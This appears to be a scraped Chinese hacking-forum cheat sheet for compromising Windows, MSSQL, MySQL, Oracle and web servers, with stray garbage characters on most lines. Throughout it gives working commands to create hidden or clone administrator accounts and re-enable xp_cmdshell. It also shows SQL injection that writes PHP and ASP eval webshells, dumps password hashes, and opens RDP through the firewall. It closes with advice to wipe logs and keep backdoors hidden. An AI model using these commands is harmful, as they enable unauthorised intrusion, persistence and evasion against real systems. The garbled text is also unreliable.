$ G1 w {( I2 t1 [ F* B: J1.net user administrator /passwordreq:no) e1 h; A- r) y( |1 D# [, B2 e
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
7 {, x$ P2 @) f% v2.比较巧妙的建克隆号的步骤3 O/ W! K0 W% d5 A
先建一个user的用户- c; G; p) `1 Y6 A- {8 L) K+ Y/ A
然后导出注册表。然后在计算机管理里删掉
2 y- k+ h( E8 N# Y! {. E在导入,在添加为管理员组
1 O$ L3 ?& |1 f' @0 g8 Z3.查radmin密码 t% `$ q. n9 d4 @) w- e/ A
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
3 @1 W7 ?+ \# |+ j4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
+ _/ C! R) v4 M- D Q建立一个"services.exe"的项& [9 B: m& y; J% t) G
再在其下面建立(字符串值)9 U1 e4 l7 G |8 W
键值为mu ma的全路径! G6 l" P6 A1 R. `+ P
5.runas /user:guest cmd$ k! ?0 F) [; h1 h0 Y9 H
测试用户权限!9 W/ d$ j, G. _9 ~9 ]; V& }: ^3 o
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
: {3 h+ Y% X6 ~' J. N. P7 v; Z7.入侵后漏洞修补、痕迹清理,后门置放:
3 V! G! [( n; i/ t( }! z( U# }! q基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门6 R- L* J G7 A" w3 V* N. t! K
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c6 Q. t S, h1 m4 R, J( o; n0 v
- ~( G& t$ x& k6 q( |
for example+ C4 Q4 o7 k+ ]4 r5 c; s
. p5 b& r, `2 N) E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
& I) Q$ E, ]% y' j5 U6 y* q& |, ~) Z
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9 x2 J# L. A7 I8 H" ^7 O/ p; d% c; v5 l0 m2 r2 u, h, r
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
8 ^( {6 N6 s7 {% w7 [$ `/ C如果要启用的话就必须把他加到高级用户模式
( U! A1 e2 b5 G- ]可以直接在注入点那里直接注入
) U+ h1 c& c0 J; o; K5 {/ hid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
( N6 {6 X! z1 u( S) T% \* m然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--# L! q' P' I- A; u
或者 X9 ~* X( w9 V8 n$ j( Y) a
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 ?3 [2 C7 @4 G6 q
来恢复cmdshell。- G3 R7 @1 u0 M6 i( w7 Y
/ @( X% E7 q& G) h+ g) M分析器- x e3 B1 z; I: @6 y
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
n7 z) c& S9 x% w然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
1 [7 r; @4 {- K1 l6 h' w: K10.xp_cmdshell新的恢复办法6 s, O4 R4 v' u
xp_cmdshell新的恢复办法
6 A2 L8 x6 }4 O3 y扩展储存过程被删除以后可以有很简单的办法恢复:
' U7 v, b! }- N7 H* q删除
2 h- ~9 X- h# R. c8 ^3 n7 Cdrop procedure sp_addextendedproc; I0 i9 B9 W. M s& g8 k6 L" O
drop procedure sp_oacreate
" z% ~( Y6 f% }exec sp_dropextendedproc 'xp_cmdshell'! G* K5 \4 p' L1 f3 V! o Z
8 v) d; t- X' r$ M8 v2 _恢复
1 @- x9 z; \9 {0 odbcc addextendedproc ("sp_oacreate","odsole70.dll"), I0 F7 z1 r5 V4 B& e/ z+ {3 b. g
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
5 j1 [4 O0 M9 F2 R+ \) X
3 r6 h6 e ^" B: K9 _2 S% h: U7 B1 x这样可以直接恢复,不用去管sp_addextendedproc是不是存在+ w9 I2 `+ |4 R7 X- Y6 n
6 x) u0 [; G2 D, ?3 M( C% R-----------------------------
' x( a3 o0 B3 z2 E. M* e( ~/ W; e, {* M3 A2 c7 |) @
删除扩展存储过过程xp_cmdshell的语句:
q& z3 M: M, B* L: dexec sp_dropextendedproc 'xp_cmdshell'% T4 |; X( c0 v& ?
/ k# W4 A& i* r, a& z8 b恢复cmdshell的sql语句
5 ?; W- ~, Y% T; t# cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 B( \* _7 t" f% d' U+ k
) W) ~; \: W- M. v0 E: r$ ]3 y/ p4 h* ~+ B: z& p I& O
开启cmdshell的sql语句
B; F: g4 `5 L! c5 T* k. o H9 x
1 B7 o8 ?4 }' m1 g6 r! \9 Bexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
: b" v$ \1 x1 ?- v n# a
2 J% ~" m. k P- e0 e7 m; z3 Z判断存储扩展是否存在
: r" @* W) q5 H2 I2 G. _6 Uselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
' r1 H9 q- Y& s; w返回结果为1就ok6 ]0 J# Q p' s
% t, E$ S4 V: q* G U
恢复xp_cmdshell
" Z# g0 T: e5 t# aexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'( b+ R/ V3 a5 J% K2 A4 X' c
返回结果为1就ok1 i$ T/ n6 `$ D# p; m
7 i- r5 n' R3 f. Z& W* N. V0 N否则上传xplog7.0.dll( K9 l: j& \" m% y8 n" H# h6 C
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
' e) U( U" }6 Q, a; @0 t9 v! ]/ o# A, i- s% d( v
堵上cmdshell的sql语句
1 i' H: R7 V/ s: x% g$ @. fsp_dropextendedproc "xp_cmdshel/ O5 \0 k" F: ]- Z0 ?) N
-------------------------8 x5 d G6 x+ b$ k
清除3389的登录记录用一条系统自带的命令:9 O3 I/ h. @5 M7 T* S) d
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f* X, D2 J9 b& C1 P6 ^
9 k) E u. G. K$ t$ H8 y l/ r
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
; L! [7 u" \0 h2 E2 @7 b; a" e% t2 ~ k在 mysql里查看当前用户的权限
d( t5 B$ ~- j) i/ k% Lshow grants for + x4 S' t0 z' q- F$ ?$ }
! D4 M9 \0 g/ R1 x- b以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
9 t3 n" b1 B& @- G1 J# q/ b4 j4 C& e$ Z" w
+ [5 X, l6 b9 C% \- Q6 r" @Create USER 'itpro'@'%' IDENTIFIED BY '123';
8 t6 y( O) g8 _$ p7 Y- |5 l& H- w8 b$ k+ i B
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
& m! _/ Q; T* X+ \& c3 H; W" n8 Z7 r$ u! m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0' o/ g3 u0 B4 a# P. L
z0 c4 P }4 T* w+ u8 J3 d( }MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
$ M0 ~5 `# q; y% K+ ~
; G$ r! T9 @6 W5 K* U2 N! V2 T搞完事记得删除脚印哟。" R; X2 R7 I5 q2 K8 |4 X% K; n) M
/ ~$ E. A1 C8 _/ r/ h
Drop USER 'itpro'@'%';1 D3 ?% T2 U% R4 O4 x3 r
6 b3 Z( Y4 ^! O; D2 m
Drop DATABASE IF EXISTS `itpro` ;
3 D4 C2 F5 n9 y- p
+ d) w) n9 ?; o6 a, H当前用户获取system权限, J9 t% K1 V/ p
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 {( Y/ y% G, @8 R3 a' W2 X/ W( e A
sc start SuperCMD4 Y: K+ B: |- A+ }5 F$ V
程序代码. [/ v% h# i; \( P/ I- n
<SCRIPT LANGUAGE="VBScript">0 N \/ D, ^" b6 l& l" z& f
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
0 H+ r5 d: D1 N) fos="WinNT://"&wsnetwork.ComputerName
! T4 X0 L+ E/ X% ^8 h. E( oSet ob=GetObject(os)5 ]! |4 [! c$ C H0 o
Set oe=GetObject(os&"/Administrators,group")- X& Z! T1 M7 D" w9 t5 Y
Set od=ob.Create("user","nosec")
w' S" [/ m& sod.SetPassword "123456abc!@#"
$ a5 S' L' `9 a _od.SetInfo
# O% r; @9 I2 t* I* M2 Z- ]Set of=GetObject(os&"/nosec",user)( U, p7 b4 J u( [* r( X/ O
oe.add os&"/nosec"' a, u& R/ _0 ~1 S$ Y
</Script>
! [6 c/ n& F( E X) M, i# m. C$ ^<script language=javascript>window.close();</script>
) y1 b* \5 o( ?5 U6 B ]
; j2 y6 C( Y; ^. I* p
: G/ q: J& }4 _9 \8 w. {; r) `; b8 j- m1 n6 }& B
% x9 B6 K$ v* W$ X r) g" O突破验证码限制入后台拿shell5 F' p f; r' U
程序代码
! ?( b4 A6 X' h. [! o+ ?. `+ l/ R& xREGEDIT4
3 {9 ^/ u) d( X: s- p5 W+ i[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
9 x4 o6 }7 X8 ]* _6 \2 q"BlockXBM"=dword:000000004 F/ Q7 K, X8 c. w; E$ n! ^1 ]
& D& }, N8 _. ^+ [' [ X7 `保存为code.reg,导入注册表,重器IE4 a& l0 N/ n' _, _) `5 b+ M
就可以了
3 y+ D& O1 M" S; t0 ] f: Junion写马% B) T. }) O+ R, n) ]
程序代码
, f0 Z8 D! Q$ z& ?www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
, A( s, l, ?+ S& F0 s$ T5 T' i6 i- l% L) I9 m; W
应用在dedecms注射漏洞上,无后台写马7 p5 i) O8 K& H- Q# h# j' g
dedecms后台,无文件管理器,没有outfile权限的时候# w$ I+ K9 {7 R# v( e2 E/ H
在插件管理-病毒扫描里! E$ ?) U4 o, i1 I; [( a, N9 \5 K/ g
写一句话进include/config_hand.php里0 ~3 m) \' o5 o/ `9 p5 u( p4 m
程序代码
: z- M$ I( g4 E2 g# n>';?><?php @eval($_POST[cmd]);?>
7 W( g' m+ {8 f0 V) ^$ c# u( g5 F$ @/ v; h, Z- A0 V( B
5 O) ?0 u j R% Q O7 ]' |如上格式6 `: k1 E/ t# G+ Z* i% \! y7 [
9 b+ N' N4 h+ D6 P- J" Horacle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解; R P6 Q7 s! e" e
程序代码0 n m4 \; a# C
select username,password from dba_users;
0 E+ o: i! y9 }$ k) ^+ h3 U2 B" \& Z( u2 U, g* R
" O$ z; C( @ i* K
mysql远程连接用户
3 V9 k0 m% x W" N. G- n程序代码
) a1 C- t- f* V- B# @% z4 N* _6 z7 n" E" _3 v7 N
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
7 G4 H/ y, W9 P' AGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
! T9 Y n _/ F4 U8 v5 ]MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# U* S( `( N, t. A4 \1 z4 F O
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" B) c" r y7 x5 I
) P' l( {9 S( {4 _3 x9 R3 r
/ x# @% c* v' L4 c1 ?
+ d/ `0 c- ~) { n6 x `. Z2 n2 E! G: P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
( r7 Q" {- Q" J9 P- x* {& x& x# ]! I, M# s3 l4 @) d
1.查询终端端口
4 z$ _ W2 ^2 i8 }; U5 e
5 \. ]/ ?+ i9 L% f1 f* J* rxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0 K$ L* j* W- y' r( E- d1 z& l, ]) i' i% P
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"* U7 t+ X$ H' c2 r+ q8 }+ t
type tsp.reg3 i( Y$ J3 G& U
1 v8 q5 j% Z) y# R/ l* c. P
2.开启XP&2003终端服务, `* k6 ] P Z% m. T% _
; h ^3 Y, f3 l0 M5 X
/ a- p; A% p, o3 kREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f4 v3 {$ X1 Z+ H5 A9 d2 ~
& ^2 M4 A6 ^2 m4 B$ T" B6 h3 p+ X
0 c0 G9 U: x- Z: [7 |: KREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
! A2 e* \' A3 \$ ~4 ?
1 x& C/ S' U: U/ z4 d; p( u6 j3.更改终端端口为20008(0x4E28)6 x: a1 x4 f" |) g/ U
3 T6 s* m8 S7 A1 o0 x
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f5 \9 N) y0 o5 @0 H1 F% ~( ~
- C4 {, ]# V- E. E! |* _
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
9 m8 s/ Z3 s" @. T- o& f! Y' e% Y
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制4 Z7 S1 C0 S8 Z9 k! }+ E( t, D1 j
8 Z' T z" u C& r
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
+ F- ?; G& L5 S( B& h
9 R1 f9 }7 F8 p& x8 F7 H3 L
% H% w* H0 e$ s! k" v5.开启Win2000的终端,端口为3389(需重启)
* ?9 r; m( r& L! G; S% Y2 K# x# R7 U B. x* r
echo Windows Registry Editor Version 5.00 >2000.reg
3 w2 v, I& `3 k9 Decho. >>2000.reg
5 ~; b! u; l8 oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg + _; ]0 w2 C; U; a
echo "Enabled"="0" >>2000.reg 6 T$ J& N9 t3 ]+ A {3 r" B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg , K! m( i- ?, a% j5 g6 u
echo "ShutdownWithoutLogon"="0" >>2000.reg
) @- b" g, o. K; ~echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
1 }3 T2 o4 t( l9 mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
+ a2 [+ i0 j: _$ s- wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg : e+ O. U7 A, b2 |. k% T" t
echo "TSEnabled"=dword:00000001 >>2000.reg , U0 ]3 `/ [5 L& ^/ U4 s+ E' S# e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 4 H1 M3 v% n2 l8 D
echo "Start"=dword:00000002 >>2000.reg ) F- Q$ `# ^* v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
: E/ }5 x4 w, {$ c- qecho "Start"=dword:00000002 >>2000.reg 4 B6 Q% d8 K/ m" `
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
. q1 ~' M( R" H$ H! ?7 Becho "Hotkey"="1" >>2000.reg
! A9 j$ N- P$ n- j [) C8 u. xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg $ X: i$ h) n/ e+ T
echo "ortNumber"=dword:00000D3D >>2000.reg 4 G! U( A4 }" g* g4 _2 z; ~8 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 4 Y. W; b0 z1 F9 M* Y
echo "ortNumber"=dword:00000D3D >>2000.reg H- `; _# {4 G) c$ v& e
! } p0 L, R. J3 q6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
9 e8 A* E: s: @" x6 [/ x4 l( }
1 d9 x) h) Y# ?; L# u@ECHO OFF & cd/d %temp% & echo [version] > restart.inf8 Y1 B# K0 G* Z6 m5 o( `1 U
(set inf=InstallHinfSection DefaultInstall)
' Y! Y" L) a2 U" `" f( Y; h7 X9 mecho signature=$chicago$ >> restart.inf5 n- m, j$ \5 B
echo [defaultinstall] >> restart.inf
7 v; ^+ N/ X* O2 h+ e! arundll32 setupapi,%inf% 1 %temp%\restart.inf4 j' M$ a; u- Z7 T1 R: l1 k
7 Q( q4 _$ a9 p0 }! `2 j+ J6 s
1 t/ \( ?( Y. l5 _$ H1 ^7.禁用TCP/IP端口筛选 (需重启)- {! x% V% q: ]+ h: S) f @
: ^ H4 b( ]* }" Z$ W! q! OREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f- t ^ U/ a( V
7 u) ]; c5 i: ?3 j U' Q9 Q
8.终端超出最大连接数时可用下面的命令来连接
+ v/ O7 r9 p4 `/ f- a! ?9 }- x" i" f+ D9 e- ]6 u2 X- d0 o
mstsc /v:ip:3389 /console
" e2 X0 j) k" K( u3 e, W/ F4 Z& q* l6 _& |
9.调整NTFS分区权限
. {" K& _: i7 A' B8 z% o
' H0 n' i- g% J" t$ @cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)0 t" b/ \. M, L/ r f$ \
" M8 x3 z3 h! Z: ^: b! I; Hcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) a0 f" k4 E; P
) a9 j1 e& y0 ^8 u- V) G------------------------------------------------------
* O4 }7 i) i2 I3389.vbs
3 B& D+ s. f2 b i1 }On Error Resume Next: D4 A( z: Q" P8 x
const HKEY_LOCAL_MACHINE = &H800000026 F" P9 [" m9 y1 h, I6 z
strComputer = "."/ q& @0 r @2 D1 y
Set StdOut = WScript.StdOut/ c7 K/ z3 w+ C1 t: h
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_4 T, Q, d# R9 {( ]' {+ C
strComputer & "\root\default:StdRegProv")
, T2 ?' Q# ]# [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"/ b' B6 l% ~/ P2 a
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath: [0 P: U1 |7 r
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! f7 o# y6 t: f7 {oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
! l9 N6 K+ A! N% k$ A- YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ J7 B, h5 k: j0 C( R- Z& u1 cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"* D! z/ r& h1 ?
strValueName = "fDenyTSConnections"4 W: `* y( G- \. W) t0 ^& e( }
dwValue = 0& g; G8 M0 T8 P3 o
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue" A4 @' N; w, j$ f: Z+ L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"9 C$ M9 J5 O0 E/ @3 Z
strValueName = "ortNumber"
( `- f" R% ]3 Y% ~dwValue = 3389
L. C* n2 [7 L. U, Q" [oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# E, l7 ~6 O P
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 F& G5 N: W6 y
strValueName = "ortNumber"0 K) ^# L H. z5 P& ^6 R0 ]
dwValue = 3389
( Q5 z( L% O |% X: horeg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) s. {9 B$ F+ V$ [ T: E4 |+ D8 I) K- vSet R = CreateObject("WScript.Shell")
2 }( H$ r# ^( c3 }- h. lR.run("Shutdown.exe -f -r -t 0") 3 ] V4 P3 P2 U5 \" F
# k- b# ?7 m7 ]) a2 X2 x9 i7 G
删除awgina.dll的注册表键值
, _( B6 m$ F& H3 l# d8 t+ f: Z程序代码. {4 S& M2 w; a( l! I. L
, x) v, \3 Q- h6 S4 v( `; Wreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
/ z) s# U. e7 x0 m% w( n
/ m9 Y" ?" R4 v z% }: i
: g" z+ J! x0 ^9 H7 i- r- h7 O
2 b# M4 D: M6 h# _5 B, _/ [& m0 Y3 `' L% ]6 b8 \1 X
程序代码/ k( R5 W8 n& h7 b2 e' a
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash3 l- v9 P0 Z! `* f3 S
; w% C- U* B. [2 I5 [$ g3 U
设置为1,关闭LM Hash u* _* w/ E3 `4 S& J( n
4 q& V* \, U1 B; |- U* L* o数据库安全:入侵Oracle数据库常用操作命令
( a& e6 a. F4 f$ t/ z2 D最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。$ z3 b. @7 Z0 }# i- r8 Y
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
- l ~+ {. q N0 ~3 x$ [; }2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;8 U" g& K/ k" p5 r! J" u$ ~
3、SQL>connect / as sysdba ;(as sysoper)或
6 q/ d3 w$ ~6 _. F8 y4 V3 pconnect internal/oracle AS SYSDBA ;(scott/tiger)
; @: W2 B" Q) t# Pconn sys/change_on_install as sysdba;
6 W+ K h T# A0 u4、SQL>startup; 启动数据库实例
n$ E" `" ]/ g. X$ m v5、查看当前的所有数据库: select * from v$database;
( H, J* H; d2 K8 d( d+ yselect name from v$database;" z. A2 l+ r0 D# z! b+ C* ~
6、desc v$databases; 查看数据库结构字段( b/ `* I' c, a$ @' V! j
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:/ f* W1 d# Q& [9 R/ _
SQL>select * from V_$PWFILE_USERS;
0 R% k7 f0 ^3 }/ ?Show user;查看当前数据库连接用户
7 C$ l! X( |/ o7 V4 U" \$ V+ s8、进入test数据库:database test;
: _" M7 U1 B6 h4 X6 {8 Q4 U0 }6 U9、查看所有的数据库实例:select * from v$instance;4 \6 K0 N9 Q8 u5 {; u. `2 I) P# v
如:ora9i$ q( o- @' d4 N+ p+ a4 Q
10、查看当前库的所有数据表:( i( n U6 t; s; T+ b2 x# E: ~2 R
SQL> select TABLE_NAME from all_tables;5 s8 J* U. @& x( `- M
select * from all_tables;( G& C( c/ x2 F: W" F
SQL> select table_name from all_tables where table_name like '%u%';
# Y5 ~: F' H ^0 ?1 ?! b- UTABLE_NAME' e; E" X9 r5 ^1 {
------------------------------
* s2 ^' Q: p- b2 ?4 C$ o_default_auditing_options_
* z, m4 a, r d T. U1 ]9 W' }11、查看表结构:desc all_tables;7 u* B8 h0 o( g+ E/ \
12、显示CQI.T_BBS_XUSER的所有字段结构:1 \, t- u' E1 R# r& d
desc CQI.T_BBS_XUSER;1 }0 F. B% z0 R1 X0 \
13、获得CQI.T_BBS_XUSER表中的记录:! U2 h1 |5 q: z, K" V, A
select * from CQI.T_BBS_XUSER;
" V4 o* ~6 c' Z14、增加数据库用户:(test11/test)
" k3 }2 a7 d& _& I/ l7 [create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
% B6 W' P& ~4 n15、用户授权:! t3 w* m8 f4 y7 d0 _% _
grant connect,resource,dba to test11;# g) N6 Q( d. d0 B3 }4 r
grant sysdba to test11;
b! L4 i, k+ A3 L; W. d Dcommit;! y% g) P; }( N# u6 n' H
16、更改数据库用户的密码:(将sys与system的密码改为test.)/ c/ A! r, |- I! G% R' B
alter user sys indentified by test;
( l: @9 j1 j0 z8 Talter user system indentified by test;1 b; D7 I# W# }1 N& H
7 U- S+ D9 G( [applicationContext-util.xml( T% o2 Y0 _0 C* x$ S
applicationContext.xml
3 q3 w$ b. j# J/ q3 Wstruts-config.xml
/ S _! {; B& o% O2 fweb.xml
4 p1 l; v/ i' O: tserver.xml, t. a5 t1 t' M. t$ i( s# B e
tomcat-users.xml" A9 m5 V0 ?, l
hibernate.cfg.xml3 v8 @7 F3 L+ x* e6 [& T. _
database_pool_config.xml$ a- Z% B0 y* R' d
) w9 P P8 {0 g0 @6 N# i
- K; j Q7 G. m8 ^( w\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置- e% a2 D$ U: [* M& p
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
0 M/ {. m( u, N; a% b9 J, |\WEB-INF\struts-config.xml 文件目录结构5 J1 B* S! R& A& D4 o3 f p6 U+ [8 L
7 e+ f& ^3 I: L) }: q( B
spring.properties 里边包含hibernate.cfg.xml的名称
, G( {: c$ A1 D0 Y; I) L
0 {' f) D4 B" h; I n1 q' i9 P( B8 }1 \2 C( v. S$ a( [5 s* ~
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml0 S3 h5 P! @/ _- T* P
" I* [$ p' U) y8 \" M1 M Q
如果都找不到 那就看看class文件吧。。
+ E# ^/ |5 v! t0 y/ n
+ [% S8 R7 J! `" Y8 w' h测试1:
! z p) P+ O; qSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
' L8 F: P5 Z l/ @2 N0 W9 X3 s/ @
3 k6 _; e) U3 p' ~$ @7 ?8 d( U测试2:
5 _$ D; U1 A9 S- Y2 Q2 W8 v3 j* v8 [ _5 B4 D
create table dirs(paths varchar(100),paths1 varchar(100), id int)0 E, e& @' l$ b: a% a
) }$ e4 J+ m7 C/ \# W
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--( X! Q. p e# q* E
; A' q) [# P7 `7 P+ f% m) S( ]
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1! X9 B$ |* _ v4 m
0 |! z/ W$ O9 ?- M( G! ? |
查看虚拟机中的共享文件:! U$ w4 X- t$ J- n* {
在虚拟机中的cmd中执行( D7 {0 ^" L9 K# N) M
\\.host\Shared Folders: y8 ] d) m% o! I
) M1 {0 \3 n: l7 U( n1 F( c0 b0 [
cmdshell下找终端的技巧
1 o& [. Z P4 O找终端: $ |: k& Z: i6 M; I
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! + C2 ]+ X2 A" A; ~/ J
而终端所对应的服务名为:TermService
& E" ^- f& y, P: C第二步:用netstat -ano命令,列出所有端口对应的PID值! 4 l* `' J( |( ~- i7 R( C5 g* s
找到PID值所对应的端口3 ]" f* g }4 U* ^) G% H
5 i$ l; X. s3 W; _* ^查询sql server 2005中的密码hash, [9 }% D' p* |& V
SELECT password_hash FROM sys.sql_logins where name='sa'1 Z, h; _2 J7 R4 e/ r
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a& ?' T$ q+ N6 V# z0 `
access中导出shell
" b+ G5 W# Z( w, Y1 G/ j: N2 S
- ^' D$ z$ x- u/ p7 o& u" n中文版本操作系统中针对mysql添加用户完整代码:: t$ r* Q% P/ q5 M5 t
